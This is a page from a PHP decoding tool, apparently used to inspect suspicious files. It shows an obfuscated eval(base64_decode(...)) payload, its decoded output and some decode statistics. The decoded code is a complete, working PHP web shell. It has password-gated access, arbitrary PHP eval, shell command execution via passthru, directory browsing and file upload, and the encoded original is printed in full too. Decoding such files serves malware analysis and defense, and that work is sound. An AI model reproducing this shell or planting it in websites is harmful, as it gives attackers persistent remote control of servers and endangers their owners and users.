Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtz..

Decoded Output download

error_reporting(0);set_magic_quotes_runtime(0);session_start();
$password='cc4fbc3bbef2b6d581f85a3af9e36501';
if(md5($_REQUEST['password'])==$password or $_SESSION['login']=='1'){
$_SESSION['login']='1';
if($_REQUEST['eval']){eval($_REQUEST['eval']);}
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){$s="\";}else{$s="/";}$ad=$_REQUEST['ad'];
if ($ad){chdir($ad);}else{$ad=getcwd();}if ($_FILES["ff"]){move_uploaded_file($_FILES["ff"]["tmp_name"], $_FILES["ff"]["name"]);}
if ($hr = opendir($ad)) {while($f = readdir($hr)){if(is_dir($f)){$df=$df.$f.'
';}else{$lf=$lf.$f.'
';}}closedir($hr);}$form='<form action="" method=get>';echo '<center><textarea cols=90 rows=20>';if($_GET['cme']){passthru($_GET['cme']);}else{echo $df.$lf;};echo'</textarea>'.$form.'Change Dir : <input name=ad size=50 value='.getcwd().$s.'><input type=submit value=Go></form>'.$form.'Command Execute : <input name=cme size=50 value=id> <input type=submit value=eXecute></form><form action="" method=post enctype=multipart/form-data>Upload : <input size=50 type=file name=ff > <input type=hidden name=ad value='.getcwd().'><input type=submit value=Send></form>';
}

Did this file decode correctly?

Original Code

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApO3NldF9tYWdpY19xdW90ZXNfcnVudGltZSgwKTtzZXNzaW9uX3N0YXJ0KCk7DQokcGFzc3dvcmQ9J2NjNGZiYzNiYmVmMmI2ZDU4MWY4NWEzYWY5ZTM2NTAxJzsNCmlmKG1kNSgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pPT0kcGFzc3dvcmQgb3IgJF9TRVNTSU9OWydsb2dpbiddPT0nMScpew0KJF9TRVNTSU9OWydsb2dpbiddPScxJzsNCmlmKCRfUkVRVUVTVFsnZXZhbCddKXtldmFsKCRfUkVRVUVTVFsnZXZhbCddKTt9DQppZihzdHJ0b2xvd2VyKHN1YnN0cihQSFBfT1MsIDAsIDMpKSA9PSAid2luIil7JHM9IlxcIjt9ZWxzZXskcz0iLyI7fSRhZD0kX1JFUVVFU1RbJ2FkJ107DQppZiAoJGFkKXtjaGRpcigkYWQpO31lbHNleyRhZD1nZXRjd2QoKTt9aWYgKCRfRklMRVNbImZmIl0pe21vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWyJmZiJdWyJ0bXBfbmFtZSJdLCAkX0ZJTEVTWyJmZiJdWyJuYW1lIl0pO30NCmlmICgkaHIgPSBvcGVuZGlyKCRhZCkpIHt3aGlsZSgkZiA9IHJlYWRkaXIoJGhyKSl7aWYoaXNfZGlyKCRmKSl7JGRmPSRkZi4kZi4nDQonO31lbHNleyRsZj0kbGYuJGYuJw0KJzt9fWNsb3NlZGlyKCRocik7fSRmb3JtPSc8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPWdldD4nO2VjaG8gJzxjZW50ZXI+PHRleHRhcmVhIGNvbHM9OTAgcm93cz0yMD4nO2lmKCRfR0VUWydjbWUnXSl7cGFzc3RocnUoJF9HRVRbJ2NtZSddKTt9ZWxzZXtlY2hvICRkZi4kbGY7fTtlY2hvJzwvdGV4dGFyZWE+Jy4kZm9ybS4nQ2hhbmdlIERpciA6IDxpbnB1dCBuYW1lPWFkIHNpemU9NTAgdmFsdWU9Jy5nZXRjd2QoKS4kcy4nPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT1Hbz48L2Zvcm0+Jy4kZm9ybS4nQ29tbWFuZCBFeGVjdXRlIDogPGlucHV0IG5hbWU9Y21lIHNpemU9NTAgdmFsdWU9aWQ+IDxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT1lWGVjdXRlPjwvZm9ybT48Zm9ybSBhY3Rpb249IiIgbWV0aG9kPXBvc3QgZW5jdHlwZT1tdWx0aXBhcnQvZm9ybS1kYXRhPlVwbG9hZCA6IDxpbnB1dCBzaXplPTUwIHR5cGU9ZmlsZSBuYW1lPWZmID4gPGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YWQgdmFsdWU9Jy5nZXRjd2QoKS4nPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT1TZW5kPjwvZm9ybT4nOw0KfQ==')); ?> 

Function Calls

base64_decode 1

Variables

None

Stats

MD5 7614c7b2e90e0abee08b48a019998ba5
Eval Count 1
Decode Time 81 ms